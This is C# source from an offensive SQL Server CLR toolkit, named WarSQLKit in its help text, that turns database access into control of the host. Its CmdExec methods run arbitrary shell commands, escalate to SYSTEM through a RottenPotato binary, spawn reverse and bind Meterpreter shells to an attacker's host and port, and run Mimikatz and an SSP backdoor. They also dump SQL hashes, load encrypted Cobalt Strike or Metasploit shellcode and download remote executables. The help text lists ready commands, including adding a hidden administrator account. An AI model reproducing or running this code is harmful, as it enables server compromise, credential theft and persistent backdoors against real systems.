public static void CmdExec(string cmd)
{
SqlContext.Pipe.Send("Command is running, please wait.");
if (!cmd.Contains("sp_") && !cmd.Contains("/RunSystemPriv") && !cmd.Contains("/RunSystemPS"))
{
SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
}
if (cmd.Contains("/RunSystemPS"))
{
try
{
if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
{
SqlContext.Pipe.Send("Creating Kumpir File");
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
}
var newCmd = cmd.Replace("/RunSystemPS", "");
var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
RunSystemPS("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + "\"" + newCmdReplace + "\"");
}
catch (Exception e)
{
Console.WriteLine(e);
throw;
}
finally
{
File.Delete("C:\\ProgramData\\Kumpir.exe");
}
}
if (cmd.Contains("/RunSystemPriv"))
{
try
{
if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
{
SqlContext.Pipe.Send("Creating Kumpir File");
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
SqlContext.Pipe.Send("Dosya Oluþturuldu");
}
var newCmd = cmd.Replace("/RunSystemPriv", "");
var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
SqlContext.Pipe.Send("Running command with \"NT AUTHORITY\\SYSTEM\" rights");
RunSystemPriv("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + newCmdReplace);
}
catch (Exception e)
{
SqlContext.Pipe.Send("Task hataya " + e.Message);
}
finally
{
File.Delete("C:\\ProgramData\\Kumpir.exe");
}
}
if (cmd == "sp_Mimikatz")
{
if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
{
SqlContext.Pipe.Send("Creating Kumpir File");
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
}
try
{
var mimiBuilder = new MeterpreterBuilder();
mimiBuilder.SaveMimikatz();
var getMimikatzLocation = @"C:\ProgramData\MimiPs.exe";
SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
RunCommand("cmd.exe",
" /c C:\\ProgramData\\Kumpir.exe \"" + getMimikatzLocation + "\"");
GetMimiLog();
}
catch (Exception e)
{
Console.WriteLine(e);
throw;
}
finally
{
File.Delete("C:\\ProgramData\\Kumpir.exe");
File.Delete("C:\\ProgramData\\MimiPs.exe");
}
}
if (cmd.Contains("sp_meterpreter_reverse_tcp"))
{
if (cmd.Contains("GetSystem"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2],
IsRunSystemPriv = true
};
buildMeterpreter.SaveReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
else
{
try
{
string[] cmdSplit = cmd.Split(' ');
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2]
};
buildMeterpreter.SaveReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
}
if (cmd.Contains("sp_x64_meterpreter_reverse_tcp"))
{
if (cmd.Contains("GetSystem"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2],
IsRunSystemPriv = true
};
buildMeterpreter.Savex64ReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
else
{
try
{
string[] cmdSplit = cmd.Split(' ');
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2]
};
buildMeterpreter.Savex64ReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
}
if (cmd.Contains("sp_meterpreter_reverse_rc4"))
{
if (cmd.Contains("GetSystem"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2],
IsRunSystemPriv = true
};
buildMeterpreter.SaveMeterpreterRc4();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
else
{
try
{
string[] cmdSplit = cmd.Split(' ');
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2]
};
buildMeterpreter.SaveMeterpreterRc4();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
}
if (cmd.Contains("sp_meterpreter_bind_tcp"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
if (cmd.Contains("GetSystem"))
{
var buildMeterpreter = new MeterpreterBuilder
{
Port = cmdSplit[1],
IsRunSystemPriv = true
};
buildMeterpreter.SaveBindMeterpreter();
}
else
{
var buildMeterpreter = new MeterpreterBuilder {
Port = cmdSplit[1]
};
buildMeterpreter.SaveBindMeterpreter();
}
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
if (cmd == "sp_getSqlHash")
{
GetSqlHash();
}
if (cmd == "sp_getProduct")
{
GetProduct();
}
if (cmd == "sp_getDatabases")
{
GetDatabases();
}
if (cmd.Contains("sp_downloadFile"))
{
var spliter = cmd.Split(' ');
var downloadFile = new FileDownloader(spliter[1], spliter[2]);
downloadFile.StartDownload(Int32.Parse(spliter[3]));
RunCommand("cmd.exe", " /c dir " + spliter[2]);
}
if (cmd == "sp_help")
{
SqlContext.Pipe.Send("WarSQLKit Command Example");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'whoami'; => Any Windows command");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY\\SYSTEM rights");
SqlContext.Pipe.Send("EXEC sp_cmdExec '\"net user eyup P@ssw0rd1 /add\" /RunSystemPriv'; => Adding users with RottenPotato (Kumpir)");
SqlContext.Pipe.Send("EXEC sp_cmdExec '\"net localgroup administrators eyup /add\" /RunSystemPriv'; => Adding user to localgroup with RottenPotato (Kumpir)");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS'; => (Powershell) with RottenPotato (Kumpir)");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x64 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection RC4 with NT AUTHORITY\\SYSTEM, RC4PASSWORD=warsql");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem'; => x86 Meterpreter Bind Connection with NT AUTHORITY\\SYSTEM");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_Mimikatz'; " + Environment.NewLine + "select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :)");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\\ProgramData\\file.exe 300'; => Download File");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_getSqlHash'; => Get MSSQL Hash");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_getProduct'; => Get Windows Product");
SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_getDatabases'; => Get Available Database");
}
}
public static void CmdExec(String cmd, out SqlString result)
{
SqlContext.Pipe.Send("Command is running, please wait.");
SqlParameter param = new SqlParameter("@result", SqlDbType.NText, -1);
result = "";
if (!cmd.Contains("sp_") && !cmd.Contains("/RunSystemPriv") && !cmd.Contains("/RunSystemPS"))
{
result = RunCommand("cmd.exe", " /c " + cmd);
if (result.ToString().Length < 4000)
{
SqlContext.Pipe.Send(result.ToString());
}
}
if (cmd.Contains("/RunSystemPS"))
{
try
{
if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
{
SqlContext.Pipe.Send("Creating Kumpir File");
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
}
var newCmd = cmd.Replace("/RunSystemPS", "");
var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
result = RunSystemPS("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + "\"" + newCmdReplace + "\"");
}
catch (Exception e)
{
Console.WriteLine(e);
throw;
}
finally
{
File.Delete("C:\\ProgramData\\Kumpir.exe");
}
}
if (cmd.Contains("/RunSystemPriv"))
{
try
{
if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
{
SqlContext.Pipe.Send("Creating Kumpir File");
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
}
var newCmd = cmd.Replace("/RunSystemPriv", "");
var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
SqlContext.Pipe.Send("Running command with \"NT AUTHORITY\\SYSTEM\" rights");
result = RunSystemPriv("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + newCmdReplace);
}
catch (Exception e)
{
SqlContext.Pipe.Send("Task hataya " + e.Message);
}
finally
{
File.Delete("C:\\ProgramData\\Kumpir.exe");
}
}
if (cmd == "sp_Mimikatz")
{
if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
{
SqlContext.Pipe.Send("Creating Kumpir File");
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
}
try
{
var mimiBuilder = new MeterpreterBuilder();
mimiBuilder.SaveMimikatz();
var getMimikatzLocation = @"C:\ProgramData\MimiPs.exe";
SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
result = RunCommand("cmd.exe",
" /c C:\\ProgramData\\Kumpir.exe \"" + getMimikatzLocation + "\"");
result = GetMimiLog();
}
catch (Exception e)
{
Console.WriteLine(e);
throw;
}
finally
{
File.Delete("C:\\ProgramData\\Kumpir.exe");
File.Delete("C:\\ProgramData\\MimiPs.exe");
}
}
if (cmd == "sp_MimikatzSSP")
{
if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
{
SqlContext.Pipe.Send("Creating Kumpir File");
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
}
try
{
var mimiBuilder = new MeterpreterBuilder();
mimiBuilder.SaveMimikatzSsp();
var getMimikatzLocation = @"C:\ProgramData\MimiSSP.exe";
SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
result = RunCommand("cmd.exe",
" /c C:\\ProgramData\\Kumpir.exe \"" + getMimikatzLocation + "\"");
result = GetMimiLog();
}
catch (Exception e)
{
Console.WriteLine(e);
throw;
}
finally
{
File.Delete("C:\\ProgramData\\Kumpir.exe");
File.Delete("C:\\ProgramData\\MimiSSP.exe");
}
}
if (cmd.Contains("sp_ShellCode"))
{
string[] cmdSplit = cmd.Split(' ');
string ScByte = cmdSplit[1];
string Key = cmdSplit[2];
if (!File.Exists("C:\\ProgramData\\loader.exe"))
{
SqlContext.Pipe.Send("Creating loader File");
var createKumpir = new CreateKumpir();
createKumpir.LoaderBytes();
}
if (cmd.Contains("GetSystem"))
{
try
{
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
RunCommand(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe ""C:\ProgramData\loader " + ScByte + @" " + Key + @" """);
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
else
{
try
{
RunCommand(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\loader " + ScByte + @" " + Key + @" """);
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
}
if (cmd.Contains("sp_meterpreter_reverse_tcp"))
{
if (cmd.Contains("GetSystem"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2],
IsRunSystemPriv = true
};
buildMeterpreter.SaveReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
else
{
try
{
string[] cmdSplit = cmd.Split(' ');
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2]
};
buildMeterpreter.SaveReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
}
if (cmd.Contains("sp_x64_meterpreter_reverse_tcp"))
{
if (cmd.Contains("GetSystem"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2],
IsRunSystemPriv = true
};
buildMeterpreter.Savex64ReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
else
{
try
{
string[] cmdSplit = cmd.Split(' ');
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2]
};
buildMeterpreter.Savex64ReverseMeterpreter();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
}
if (cmd.Contains("sp_meterpreter_reverse_rc4"))
{
if (cmd.Contains("GetSystem"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2],
IsRunSystemPriv = true
};
buildMeterpreter.SaveMeterpreterRc4();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
else
{
try
{
string[] cmdSplit = cmd.Split(' ');
var buildMeterpreter = new MeterpreterBuilder
{
Ip = cmdSplit[1],
Port = cmdSplit[2]
};
buildMeterpreter.SaveMeterpreterRc4();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
}
if (cmd.Contains("sp_meterpreter_bind_tcp"))
{
try
{
string[] cmdSplit = cmd.Split(' ');
var createKumpir = new CreateKumpir();
createKumpir.KumpirBytes();
if (cmd.Contains("GetSystem"))
{
var buildMeterpreter = new MeterpreterBuilder
{
Port = cmdSplit[1],
IsRunSystemPriv = true
};
buildMeterpreter.SaveBindMeterpreter();
}
else
{
var buildMeterpreter = new MeterpreterBuilder {
Port = cmdSplit[1]
};
buildMeterpreter.SaveBindMeterpreter();
}
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
}
if (cmd == "sp_getSqlHash")
{
result = GetSqlHash();
}
if (cmd == "sp_getProduct")
{
result = GetProduct();
}
if (cmd == "sp_getDatabases")
{
result = GetDatabases();
}
if (cmd.Contains("sp_downloadFile"))
{
var spliter = cmd.Split(' ');
var downloadFile = new FileDownloader(spliter[1], spliter[2]);
downloadFile.StartDownload(Int32.Parse(spliter[3]));
result = RunCommand("cmd.exe", " /c dir " + spliter[2]);
}
if (cmd == "sp_help")
{
result = "WarSQLKit Command Example\n"
+ "whoami => Any Windows command\n"
+ "whoami /RunSystemPriv => Any Windows command with NT AUTHORITY\\SYSTEM rights\n"
+ "\"net user eyup P@ssw0rd1 /add\" /RunSystemPriv => Adding users with RottenPotato (Kumpir)\n"
+ "\"net localgroup administrators eyup /add\" /RunSystemPriv => Adding user to localgroup with RottenPotato (Kumpir)\n"
+ "powershell Get-ChildItem /RunSystemPS => (Powershell) with RottenPotato (Kumpir)\n"
+ "sp_meterpreter_reverse_tcp LHOST LPORT GetSystem => x86 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM\n"
+ "sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem => x64 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM\n"
+ "sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem => x86 Meterpreter Reverse Connection RC4 with NT AUTHORITY\\SYSTEM, RC4PASSWORD=warsql\n"
+ "sp_meterpreter_bind_tcp LPORT GetSystem => x86 Meterpreter Bind Connection with NT AUTHORITY\\SYSTEM\n"
+ "sp_Mimikatz" + Environment.NewLine + "select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :)\n"
+ "sp_MimikatzSSP => Ssp Backdoor\n"
+ "sp_downloadFile http://eyupcelik.com.tr/file.exe C:\\ProgramData\\file.exe 300 => Download File\n"
+ "sp_getSqlHash => Get MSSQL Hash\n"
+ "sp_getProduct => Get Windows Product\n"
+ "sp_getDatabases => Get Available Database\n"
+ "sp_frpsocks5 => Todo: Use Frpc to open socks5\n"
+ "sp_ShellCode encrypt_code key GetSystem => Run Shellcode with Encrypt CobaltStrike or Metasploit with SYSTEM\n";
}
}